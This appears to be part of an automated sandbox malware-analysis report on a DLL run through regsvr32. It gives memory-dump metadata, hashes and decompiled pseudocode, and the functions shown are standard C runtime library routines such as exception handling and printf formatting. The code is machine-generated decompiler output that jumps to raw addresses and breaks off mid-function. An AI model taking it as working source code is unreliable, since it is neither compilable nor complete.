                                    0x7fef9d2a88a
                                    0x7fef9d2a897
                                    0x7fef9d2a8ba
                                    0x7fef9d2a8dc
                                    0x7fef9d2a8e3
                                    0x7fef9d2a8f4
                                    0x7fef9d2a8fc
                                    0x7fef9d2a901
                                    0x7fef9d2a906
                                    0x7fef9d2a91a
                                    0x7fef9d2a91c
                                    0x7fef9d2a92e
                                    0x7fef9d2a93c
                                    0x7fef9d2a946
                                    0x7fef9d2a94f
                                    0x7fef9d2a953
                                    0x7fef9d2a960
                                    0x7fef9d2a96a
                                    0x7fef9d2a96e
                                    0x7fef9d2a976
                                    0x7fef9d2a981
                                    0x7fef9d2a984
                                    0x7fef9d2a98b
                                    0x7fef9d2a993
                                    0x7fef9d2a99a
                                    0x7fef9d2a9a4
                                    0x7fef9d2a9ae
                                    0x7fef9d2a9b7
                                    0x7fef9d2a9bb
                                    0x7fef9d2a9c8
                                    0x7fef9d2a9d2
                                    0x7fef9d2a9d6
                                    0x7fef9d2a9de
                                    0x7fef9d2a9e9
                                    0x7fef9d2a9ec
                                    0x7fef9d2a9f3
                                    0x7fef9d2a9fb
                                    0x7fef9d2aa02
                                    0x7fef9d2aa04
                                    0x7fef9d2aa0b
                                    0x7fef9d2aa13
                                    0x7fef9d2aa1b
                                    0x7fef9d2aa20
                                    0x7fef9d2aa28
                                    0x7fef9d2aa37

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Info
                                    • String ID: $z
                                    • API String ID: 1807457897-2251613814
                                    • Opcode ID: 939841bcdfd8ad812f8c29de7d09562b703ae5a82c5ff0fab969d8d2fb6d5a5e
                                    • Instruction ID: 4853ceba84ddbb230417778543f3b3b02ea2aa858227094ccd1c634e11d49f23
                                    • Opcode Fuzzy Hash: 939841bcdfd8ad812f8c29de7d09562b703ae5a82c5ff0fab969d8d2fb6d5a5e
                                    • Instruction Fuzzy Hash: C8B1B77261CAC0CAD7B58B29E8807AFB7E0F388785F155125DAC983B99DB2DD4429F00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D34960 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 175COMMONLIBRARYCODE
                                    Download Yara Rule
                                    C-Code - Quality: 35%
                                    			E000007FE7FEF9D34960(void* __ecx, long long __rcx, long long __rdx, long long __r8, long long __r9, void* _a8, long long _a16, long long _a24, long long _a32, signed int _a40, intOrPtr _a48, long long _a56, long long _a64) {
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				char _v60;
				char _v64;
				signed int _v72;
				char _v80;
				char _v88;
				long long _v96;
				intOrPtr _v104;
				long long _v112;
				long long _v120;
				long long _v128;
				signed int _v136;
				void* _t106;
				void* _t117;
				void* _t118;
				void* _t119;
				void* _t120;
				void* _t121;
				long long _t153;
				signed int _t161;
				signed int _t165;
				long long _t166;
				long long _t169;
				long long _t170;
				intOrPtr _t174;

				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				_t153 = _a8;
				if ( *_t153 != 0x80000003) goto 0xf9d34990;
				goto 0xf9d34cc6;
				0xf9d24000();
				if ( *((long long*)(_t153 + 0xe0)) == 0) goto 0xf9d34a33;
				0xf9d24000();
				_v56 = _t153;
				E000007FE7FEF9D23D00(_t106);
				if ( *((intOrPtr*)(_v56 + 0xe0)) == _t153) goto 0xf9d34a33;
				if ( *_a8 == 0xe0434f4d) goto 0xf9d34a33;
				if ( *_a8 == 0xe0434352) goto 0xf9d34a33;
				_v120 = _a64;
				_v128 = _a56;
				_v136 = _a40;
				if (E000007FE7FEF9D2E9B0(_a8, _a16, _a24, _a32) == 0) goto 0xf9d34a33;
				goto 0xf9d34cc6;
				if ( *((intOrPtr*)(_a40 + 0xc)) == 0) goto 0xf9d34a43;
				goto 0xf9d34a48;
				E000007FE7FEF9D2CF80(_a40);
				_v120 = _a32;
				_v128 =  &_v60;
				_t161 =  &_v64;
				_v136 = _t161;
				r9d = _a48;
				r8d = _a56;
				E000007FE7FEF9D2EA30(_a16, _a40);
				_v72 = _t161;
				_v64 = _v64 + 1;
				_v72 = _v72 + 0x14;
				if (_v64 - _v60 >= 0) goto 0xf9d34cc6;
				if (_a48 -  *_v72 < 0) goto 0xf9d34c2b;
				_t165 = _v72;
				if (_a48 -  *((intOrPtr*)(_t165 + 4)) > 0) goto 0xf9d34c2b;
				_t117 = E000007FE7FEF9D2E680( *((intOrPtr*)(_t165 + 4)), _t165);
				_t166 = _t165 +  *((intOrPtr*)(_v72 + 0x10));
				if ( *((intOrPtr*)(_t166 + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14)) == 0) goto 0xf9d34b53;
				_t118 = E000007FE7FEF9D2E680(_t117, _t166);
				_v48 = _t166;
				_t119 = E000007FE7FEF9D2E680(_t118, _t166);
				_t169 = _v48 +  *((intOrPtr*)(_t166 +  *((intOrPtr*)(_v72 + 0x10)) + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14));
				_v40 = _t169;
				goto 0xf9d34b5f;
				_v40 = 0;
				if (_v40 == 0) goto 0xf9d34bff;
				_t120 = E000007FE7FEF9D2E680(_t119, _t169);
				_t170 = _t169 +  *((intOrPtr*)(_v72 + 0x10));
				if ( *((intOrPtr*)(_t170 + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14)) == 0) goto 0xf9d34be3;
				_t121 = E000007FE7FEF9D2E680(_t120, _t170);
				_v32 = _t170;
				E000007FE7FEF9D2E680(_t121, _t170);
				_v24 = _v32 +  *((intOrPtr*)(_t170 +  *((intOrPtr*)(_v72 + 0x10)) + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14));
				goto 0xf9d34bef;
				_v24 = 0;
				_t174 = _v24;
				if ( *((char*)(_t174 + 0x10)) != 0) goto 0xf9d34c2b;
				E000007FE7FEF9D2E680( *((char*)(_t174 + 0x10)), _t174);
				if (( *(_t174 +  *((intOrPtr*)(_v72 + 0x10)) + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14) & 0x00000040) == 0) goto 0xf9d34c30;
				goto L1;
				__eax = E000007FE7FEF9D2E680(__eax, __rax);
				_v72 =  *((intOrPtr*)(_v72 + 0x10));
				__rax = __rax +  *((intOrPtr*)(_v72 + 0x10));
				_v72 =  *((intOrPtr*)(_v72 + 0xc)) - 1;
				__rcx = ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14;
				__rax = __rax + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14;
				__eflags = __rax;
				_v80 = 0;
				_v88 = 1;
				__rcx = _a64;
				_v96 = _a64;
				_v104 = _a56;
				__rcx = _v72;
				_v112 = _v72;
				_v120 = 0;
				_v128 = __rax;
				__rax = _a40;
				_v136 = _a40;
				__r9 = _a32;
				__r8 = _a24;
				__rdx = _a16;
				__rcx = _a8;
				__eax = E000007FE7FEF9D35180(__edi, __esi, __esp, __eflags, _a8, _a16, _a24, _a32);
				goto L1;
				return __eax;
			}
































                                    0x7fef9d34960
                                    0x7fef9d34965
                                    0x7fef9d3496a
                                    0x7fef9d3496f
                                    0x7fef9d3497b
                                    0x7fef9d34989
                                    0x7fef9d3498b
                                    0x7fef9d34990
                                    0x7fef9d3499d
                                    0x7fef9d349a3
                                    0x7fef9d349a8
                                    0x7fef9d349ad
                                    0x7fef9d349be
                                    0x7fef9d349ce
                                    0x7fef9d349de
                                    0x7fef9d349e8
                                    0x7fef9d349f4
                                    0x7fef9d34a00
                                    0x7fef9d34a2c
                                    0x7fef9d34a2e
                                    0x7fef9d34a3f
                                    0x7fef9d34a41
                                    0x7fef9d34a43
                                    0x7fef9d34a50
                                    0x7fef9d34a5a
                                    0x7fef9d34a5f
                                    0x7fef9d34a64
                                    0x7fef9d34a69
                                    0x7fef9d34a71
                                    0x7fef9d34a89
                                    0x7fef9d34a8e
                                    0x7fef9d34a9b
                                    0x7fef9d34aa8
                                    0x7fef9d34ab5
                                    0x7fef9d34ac9
                                    0x7fef9d34acf
                                    0x7fef9d34ade
                                    0x7fef9d34ae4
                                    0x7fef9d34af2
                                    0x7fef9d34b0b
                                    0x7fef9d34b0d
                                    0x7fef9d34b12
                                    0x7fef9d34b17
                                    0x7fef9d34b46
                                    0x7fef9d34b49
                                    0x7fef9d34b51
                                    0x7fef9d34b53
                                    0x7fef9d34b68
                                    0x7fef9d34b6e
                                    0x7fef9d34b7c
                                    0x7fef9d34b95
                                    0x7fef9d34b97
                                    0x7fef9d34b9c
                                    0x7fef9d34ba4
                                    0x7fef9d34bd9
                                    0x7fef9d34be1
                                    0x7fef9d34be3
                                    0x7fef9d34bef
                                    0x7fef9d34bfd
                                    0x7fef9d34bff
                                    0x7fef9d34c29
                                    0x7fef9d34c2b
                                    0x7fef9d34c30
                                    0x7fef9d34c3a
                                    0x7fef9d34c3e
                                    0x7fef9d34c4b
                                    0x7fef9d34c4e
                                    0x7fef9d34c52
                                    0x7fef9d34c52
                                    0x7fef9d34c55
                                    0x7fef9d34c5a
                                    0x7fef9d34c5f
                                    0x7fef9d34c67
                                    0x7fef9d34c73
                                    0x7fef9d34c77
                                    0x7fef9d34c7c
                                    0x7fef9d34c81
                                    0x7fef9d34c8a
                                    0x7fef9d34c8f
                                    0x7fef9d34c97
                                    0x7fef9d34c9c
                                    0x7fef9d34ca4
                                    0x7fef9d34cac
                                    0x7fef9d34cb4
                                    0x7fef9d34cbc
                                    0x7fef9d34cc1
                                    0x7fef9d34ccd

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: MOC$RCC
                                    • API String ID: 0-2084237596
                                    • Opcode ID: ff3899ab70367f580fbe79aa5854b52896b6d0a2cba9891fdbb3d09f9aae126f
                                    • Instruction ID: 969568d65f9d334bdbb71439fdfa9ac9293f65c07e2bfce327525da45f7ede8f
                                    • Opcode Fuzzy Hash: ff3899ab70367f580fbe79aa5854b52896b6d0a2cba9891fdbb3d09f9aae126f
                                    • Instruction Fuzzy Hash: FA91193260DB8582DAA4DB55E49077EB3A0F7C4785F214526EACE83BA9CF3DE041CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D29C10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale_unlock$UpdateUpdate::~___updatetmbcinfo
                                    • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbctype.c
                                    • API String ID: 4112623284-4095683531
                                    • Opcode ID: 587d7c63c2f280d76f00a5a6279b212f57539b6122539f303ec6642172553049
                                    • Instruction ID: b519865c658f5b17901cea146d1bd99b4d455d983c8f9f0677e22a9713547b35
                                    • Opcode Fuzzy Hash: 587d7c63c2f280d76f00a5a6279b212f57539b6122539f303ec6642172553049
                                    • Instruction Fuzzy Hash: 8E911D3661DB8586E7A08B19E98036E77E0F388798F654236EACD477B8CB3DD541CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3C6F8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 98COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 19%
                                    			E000007FE7FEF9D3C6F8(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, char _a85, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a688, intOrPtr _a704, intOrPtr _a708, signed char _a816, signed int _a824, signed int _a832, intOrPtr _a840, signed short* _a848, signed char _a856, char _a860, char _a864, long long _a872, intOrPtr _a876, intOrPtr _a912, intOrPtr _a916, signed int _a1040, long long _a1048, signed short _a1056, long long _a1060, signed int _a1064, intOrPtr _a1088, char _a1112) {
				signed int _t217;
				signed char _t222;
				intOrPtr _t257;
				signed int _t332;
				signed int _t333;
				signed long long _t336;
				intOrPtr* _t359;
				signed long long _t384;

				_t332 = __rax;
				_a116 = 0x10;
				asm("bts eax, 0xf");
				_a708 = 7;
				_a708 = 0x27;
				_a72 = 0x10;
				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c754;
				_a84 = 0x30;
				_a85 = _a708 + 0x51;
				_a92 = 2;
				_a72 = 8;
				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c777;
				asm("bts eax, 0x9");
				if ((_a80 & 0x00008000) == 0) goto 0xf9d3c79e;
				E000007FE7FEF9D31EA0( &_a1112);
				_a824 = _t332;
				goto 0xf9d3c84b;
				if ((_a80 & 0x00001000) == 0) goto 0xf9d3c7c5;
				E000007FE7FEF9D31EA0( &_a1112);
				_a824 = _t332;
				goto 0xf9d3c84b;
				if ((_a80 & 0x00000020) == 0) goto 0xf9d3c810;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c7f6;
				_t333 = E000007FE7FEF9D31E40( &_a1112);
				_a824 = _t333;
				goto 0xf9d3c80e;
				E000007FE7FEF9D31E40( &_a1112);
				_a824 = _t333;
				goto 0xf9d3c84b;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c834;
				E000007FE7FEF9D31E40( &_a1112);
				_a824 = _t333;
				goto 0xf9d3c84b;
				E000007FE7FEF9D31E40( &_a1112);
				_a824 = _t333;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c882;
				if (_a824 >= 0) goto 0xf9d3c882;
				_a832 =  ~_a824;
				asm("bts eax, 0x8");
				goto 0xf9d3c892;
				_t336 = _a824;
				_a832 = _t336;
				if ((_a80 & 0x00008000) != 0) goto 0xf9d3c8c7;
				if ((_a80 & 0x00001000) != 0) goto 0xf9d3c8c7;
				_a832 = _a832 & _t336;
				if (_a116 >= 0) goto 0xf9d3c8d8;
				_a116 = 1;
				goto 0xf9d3c8f5;
				_a80 = _a80 & 0xfffffff7;
				if (_a116 - 0x200 <= 0) goto 0xf9d3c8f5;
				_a116 = 0x200;
				if (_a832 != 0) goto 0xf9d3c908;
				_a92 = 0;
				_a64 =  &_a687;
				_t217 = _a116;
				_a116 = _a116 - 1;
				if (_t217 > 0) goto 0xf9d3c936;
				if (_a832 == 0) goto 0xf9d3c9d3;
				_a1040 = _a72;
				_a816 = _t217 / _a1040 + 0x30;
				_a1048 = _a72;
				if (_a816 - 0x39 <= 0) goto 0xf9d3c9b2;
				_t222 = _a816 + _a708;
				_a816 = _t222;
				 *_a64 = _a816 & 0x000000ff;
				_a64 = _a64 - 1;
				goto 0xf9d3c915;
				_a104 = _t222;
				_a64 = _a64 + 1;
				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ca31;
				if (_a104 == 0) goto 0xf9d3ca12;
				if ( *_a64 == 0x30) goto 0xf9d3ca31;
				_a64 = _a64 - 1;
				 *_a64 = 0x30;
				_a104 = _a104 + 1;
				if (_a108 != 0) goto 0xf9d3cc6e;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ca95;
				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ca63;
				_a84 = 0x2d;
				_a92 = 1;
				goto 0xf9d3ca95;
				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ca7d;
				_a84 = 0x2b;
				_a92 = 1;
				goto 0xf9d3ca95;
				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ca95;
				_a84 = 0x20;
				_a92 = 1;
				_a840 = _a88 - _a104 - _a92;
				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3cad5;
				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
				E000007FE7FEF9D3CF60(_a92, _a64,  &_a84, _a1088,  &_a688);
				if ((_a80 & 0x00000008) == 0) goto 0xf9d3cb27;
				if ((_a80 & 0x00000004) != 0) goto 0xf9d3cb27;
				E000007FE7FEF9D3CF10(0x30, _a840, _a1088,  &_a688);
				if (_a76 == 0) goto 0xf9d3cc1d;
				if (_a104 <= 0) goto 0xf9d3cc1d;
				_a872 = 0;
				_a848 = _a64;
				_a856 = _a104;
				_a856 = _a856 - 1;
				if (_a856 == 0) goto 0xf9d3cc1b;
				_a1056 =  *_a848 & 0x0000ffff;
				r9d = _a1056 & 0x0000ffff;
				r8d = 6;
				_a872 = E000007FE7FEF9D3B530( &_a860,  &_a864, _a1088);
				_a848 =  &(_a848[1]);
				if (_a872 != 0) goto 0xf9d3cbe5;
				if (_a860 != 0) goto 0xf9d3cbf2;
				_a688 = 0xffffffff;
				goto 0xf9d3cc1b;
				E000007FE7FEF9D3CF60(_a860,  &(_a848[1]),  &_a864, _a1088,  &_a688);
				goto 0xf9d3cb60;
				goto 0xf9d3cc3b;
				E000007FE7FEF9D3CF60(_a104,  &(_a848[1]), _a64, _a1088,  &_a688);
				if (_a688 < 0) goto 0xf9d3cc6e;
				if ((_a80 & 0x00000004) == 0) goto 0xf9d3cc6e;
				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
				if (_a96 == 0) goto 0xf9d3cc8e;
				0xf9d25330();
				_a96 = 0;
				goto 0xf9d3b99c;
				if (_a704 == 0) goto 0xf9d3ccb4;
				if (_a704 == 7) goto 0xf9d3ccb4;
				_a1060 = 0;
				goto 0xf9d3ccbf;
				_a1060 = 1;
				_t257 = _a1060;
				_a876 = _t257;
				if (_a876 != 0) goto 0xf9d3cd05;
				_t359 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
				_a32 = _t359;
				r9d = 0;
				r8d = 0x8f5;
				0xf9d2b3b0();
				if (_t257 != 1) goto 0xf9d3cd05;
				asm("int3");
				if (_a876 != 0) goto 0xf9d3cd61;
				0xf9d2ab30();
				 *_t359 = 0x16;
				_a32 = 0;
				r9d = 0x8f5;
				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
				_a912 = 0xffffffff;
				E000007FE7FEF9D26800( &_a120);
				goto 0xf9d3cd80;
				_a916 = _a688;
				E000007FE7FEF9D26800( &_a120);
				return E000007FE7FEF9D23280(_a916, 2, 2, _a1064 ^ _t384, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
			}











                                    0x7fef9d3c6f8
                                    0x7fef9d3c6f8
                                    0x7fef9d3c704
                                    0x7fef9d3c70c
                                    0x7fef9d3c719
                                    0x7fef9d3c724
                                    0x7fef9d3c737
                                    0x7fef9d3c739
                                    0x7fef9d3c748
                                    0x7fef9d3c74c
                                    0x7fef9d3c756
                                    0x7fef9d3c769
                                    0x7fef9d3c76f
                                    0x7fef9d3c782
                                    0x7fef9d3c78c
                                    0x7fef9d3c791
                                    0x7fef9d3c799
                                    0x7fef9d3c7a9
                                    0x7fef9d3c7b3
                                    0x7fef9d3c7b8
                                    0x7fef9d3c7c0
                                    0x7fef9d3c7ce
                                    0x7fef9d3c7d9
                                    0x7fef9d3c7e8
                                    0x7fef9d3c7ec
                                    0x7fef9d3c7f4
                                    0x7fef9d3c7fe
                                    0x7fef9d3c806
                                    0x7fef9d3c80e
                                    0x7fef9d3c819
                                    0x7fef9d3c823
                                    0x7fef9d3c82a
                                    0x7fef9d3c832
                                    0x7fef9d3c83c
                                    0x7fef9d3c843
                                    0x7fef9d3c854
                                    0x7fef9d3c85f
                                    0x7fef9d3c86c
                                    0x7fef9d3c878
                                    0x7fef9d3c880
                                    0x7fef9d3c882
                                    0x7fef9d3c88a
                                    0x7fef9d3c89d
                                    0x7fef9d3c8aa
                                    0x7fef9d3c8bf
                                    0x7fef9d3c8cc
                                    0x7fef9d3c8ce
                                    0x7fef9d3c8d6
                                    0x7fef9d3c8df
                                    0x7fef9d3c8eb
                                    0x7fef9d3c8ed
                                    0x7fef9d3c8fe
                                    0x7fef9d3c900
                                    0x7fef9d3c910
                                    0x7fef9d3c915
                                    0x7fef9d3c91f
                                    0x7fef9d3c925
                                    0x7fef9d3c930
                                    0x7fef9d3c93b
                                    0x7fef9d3c95e
                                    0x7fef9d3c96a
                                    0x7fef9d3c997
                                    0x7fef9d3c9a9
                                    0x7fef9d3c9ab
                                    0x7fef9d3c9bf
                                    0x7fef9d3c9c9
                                    0x7fef9d3c9ce
                                    0x7fef9d3c9e0
                                    0x7fef9d3c9ec
                                    0x7fef9d3c9fc
                                    0x7fef9d3ca03
                                    0x7fef9d3ca10
                                    0x7fef9d3ca1a
                                    0x7fef9d3ca24
                                    0x7fef9d3ca2d
                                    0x7fef9d3ca36
                                    0x7fef9d3ca45
                                    0x7fef9d3ca52
                                    0x7fef9d3ca54
                                    0x7fef9d3ca59
                                    0x7fef9d3ca61
                                    0x7fef9d3ca6c
                                    0x7fef9d3ca6e
                                    0x7fef9d3ca73
                                    0x7fef9d3ca7b
                                    0x7fef9d3ca86
                                    0x7fef9d3ca88
                                    0x7fef9d3ca8d
                                    0x7fef9d3caa5
                                    0x7fef9d3cab5
                                    0x7fef9d3cad0
                                    0x7fef9d3caee
                                    0x7fef9d3cafc
                                    0x7fef9d3cb07
                                    0x7fef9d3cb22
                                    0x7fef9d3cb2c
                                    0x7fef9d3cb37
                                    0x7fef9d3cb3d
                                    0x7fef9d3cb4d
                                    0x7fef9d3cb59
                                    0x7fef9d3cb70
                                    0x7fef9d3cb79
                                    0x7fef9d3cb8a
                                    0x7fef9d3cb92
                                    0x7fef9d3cb9b
                                    0x7fef9d3cbb6
                                    0x7fef9d3cbc9
                                    0x7fef9d3cbd9
                                    0x7fef9d3cbe3
                                    0x7fef9d3cbe5
                                    0x7fef9d3cbf0
                                    0x7fef9d3cc11
                                    0x7fef9d3cc16
                                    0x7fef9d3cc1b
                                    0x7fef9d3cc36
                                    0x7fef9d3cc43
                                    0x7fef9d3cc4e
                                    0x7fef9d3cc69
                                    0x7fef9d3cc74
                                    0x7fef9d3cc80
                                    0x7fef9d3cc85
                                    0x7fef9d3cc8e
                                    0x7fef9d3cc9b
                                    0x7fef9d3cca5
                                    0x7fef9d3cca7
                                    0x7fef9d3ccb2
                                    0x7fef9d3ccb4
                                    0x7fef9d3ccbf
                                    0x7fef9d3ccc6
                                    0x7fef9d3ccd5
                                    0x7fef9d3ccd7
                                    0x7fef9d3ccde
                                    0x7fef9d3cce3
                                    0x7fef9d3cce6
                                    0x7fef9d3ccf8
                                    0x7fef9d3cd00
                                    0x7fef9d3cd02
                                    0x7fef9d3cd0d
                                    0x7fef9d3cd0f
                                    0x7fef9d3cd14
                                    0x7fef9d3cd1a
                                    0x7fef9d3cd23
                                    0x7fef9d3cd3e
                                    0x7fef9d3cd43
                                    0x7fef9d3cd53
                                    0x7fef9d3cd5f
                                    0x7fef9d3cd68
                                    0x7fef9d3cd74
                                    0x7fef9d3cd97

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: get_int64_arg
                                    • String ID: 0$9
                                    • API String ID: 1967237116-1975997740
                                    • Opcode ID: aed7fbe3ab945623e5c36a128674cf35c8ffbba07ad38133e4628ccf625e54aa
                                    • Instruction ID: c0a57250e5e6ff09cb8cd0b3e72d4402f8dee1629557039505579d47a847bcbd
                                    • Opcode Fuzzy Hash: aed7fbe3ab945623e5c36a128674cf35c8ffbba07ad38133e4628ccf625e54aa
                                    • Instruction Fuzzy Hash: 1E41C87660DAC187E7B58B19E8917AEB7E4F385791F100125EBC886B98DBBDD540CF00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3E70C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 94COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 23%
                                    			E000007FE7FEF9D3E70C(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, short _a86, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a1200, signed short _a1212, intOrPtr _a1216, intOrPtr _a1220, signed char _a1296, signed int _a1304, signed int _a1312, intOrPtr _a1320, long long _a1328, signed char _a1336, intOrPtr _a1340, intOrPtr _a1344, intOrPtr _a1376, intOrPtr _a1380, signed int _a1480, long long _a1488, long long _a1496, long long _a1504, signed int _a1512, intOrPtr _a1536, char _a1560) {
				signed int _t213;
				signed char _t218;
				void* _t249;
				intOrPtr _t257;
				signed int _t331;
				signed int _t332;
				signed long long _t335;
				intOrPtr* _t354;
				intOrPtr* _t359;
				signed long long _t389;

				_t331 = __rax;
				_a1220 = 0x27;
				_a72 = 0x10;
				if ((_a80 & 0x00000080) == 0) goto 0xf9d3e74d;
				_a84 = 0x30;
				_a86 = _a1220 + 0x51;
				_a92 = 2;
				_a72 = 8;
				if ((_a80 & 0x00000080) == 0) goto 0xf9d3e770;
				asm("bts eax, 0x9");
				if ((_a80 & 0x00008000) == 0) goto 0xf9d3e797;
				E000007FE7FEF9D31EA0( &_a1560);
				_a1304 = _t331;
				goto 0xf9d3e844;
				if ((_a80 & 0x00001000) == 0) goto 0xf9d3e7be;
				E000007FE7FEF9D31EA0( &_a1560);
				_a1304 = _t331;
				goto 0xf9d3e844;
				if ((_a80 & 0x00000020) == 0) goto 0xf9d3e809;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e7ef;
				_t332 = E000007FE7FEF9D31E40( &_a1560);
				_a1304 = _t332;
				goto 0xf9d3e807;
				E000007FE7FEF9D31E40( &_a1560);
				_a1304 = _t332;
				goto 0xf9d3e844;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e82d;
				E000007FE7FEF9D31E40( &_a1560);
				_a1304 = _t332;
				goto 0xf9d3e844;
				E000007FE7FEF9D31E40( &_a1560);
				_a1304 = _t332;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e87b;
				if (_a1304 >= 0) goto 0xf9d3e87b;
				_a1312 =  ~_a1304;
				asm("bts eax, 0x8");
				goto 0xf9d3e88b;
				_t335 = _a1304;
				_a1312 = _t335;
				if ((_a80 & 0x00008000) != 0) goto 0xf9d3e8c0;
				if ((_a80 & 0x00001000) != 0) goto 0xf9d3e8c0;
				_a1312 = _a1312 & _t335;
				if (_a116 >= 0) goto 0xf9d3e8d1;
				_a116 = 1;
				goto 0xf9d3e8ee;
				_a80 = _a80 & 0xfffffff7;
				if (_a116 - 0x200 <= 0) goto 0xf9d3e8ee;
				_a116 = 0x200;
				if (_a1312 != 0) goto 0xf9d3e901;
				_a92 = 0;
				_a64 =  &_a687;
				_t213 = _a116;
				_a116 = _a116 - 1;
				if (_t213 > 0) goto 0xf9d3e92f;
				if (_a1312 == 0) goto 0xf9d3e9cc;
				_a1480 = _a72;
				_a1296 = _t213 / _a1480 + 0x30;
				_a1488 = _a72;
				if (_a1296 - 0x39 <= 0) goto 0xf9d3e9ab;
				_t218 = _a1296 + _a1220;
				_a1296 = _t218;
				 *_a64 = _a1296 & 0x000000ff;
				_a64 = _a64 - 1;
